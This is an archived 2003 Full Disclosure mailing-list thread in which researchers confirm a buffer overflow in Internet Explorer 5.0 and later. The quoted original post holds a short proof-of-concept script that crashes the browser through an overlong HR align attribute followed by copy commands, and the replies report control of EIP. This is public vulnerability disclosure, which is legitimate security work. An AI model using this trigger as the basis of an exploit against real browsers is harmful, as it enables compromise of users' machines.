Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

Re: Internet Explorer >=5.0 : Buffer overflow

From: "SecurITeam BugTraq Monitoring" <bugtraq () securiteam com>
Date: Wed, 25 Jun 2003 13:05:20 +0200
Hi,

I can confirm it under Windows 2000 with IE 5.50.4807.2300

Full control over the EIP, but the shellcode cannot contain (as it currently
appears) non Alpha Numeric characters, too bad I guess.

Thanks
Noam Rathaus
CTO
Beyond Security Ltd
http://www.SecurITeam.com
http://www.BeyondSecurity.com
----- Original Message -----
From: "KF" <dotslash () snosoft com>
To: "Digital Scream" <digitalscream () real xakep ru>
Sent: Monday, June 23, 2003 6:43 PM
Subject: Re: Internet Explorer >=5.0 : Buffer overflow



I can confirm this on Windows XP Professional

version 6.0.2800.1106.xpsp2-030422-1633

0x43534c41 refrenced mem at 0x43534c41
-KF


Digital Scream wrote:


&lt;script&gt;
wnd=open("about:blank","","");
wnd.moveTo(screen.Width,screen.Height);
WndDoc=wnd.document;
WndDoc.open();
WndDoc.clear();
buffer="";
for(i=1;i<=127;i++)buffer+="X";
buffer+="DigitalScream";
WndDoc.write("<HR align='"+buffer+"'>");
WndDoc.execCommand("SelectAll");
WndDoc.execCommand("Copy");
wnd.close();
&lt;/script&gt;

Grtz: Nj3l, buggzy, 3APA3A, Void Team, X - Crew









_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Previous By Date Next
Previous By Thread Next

Current thread: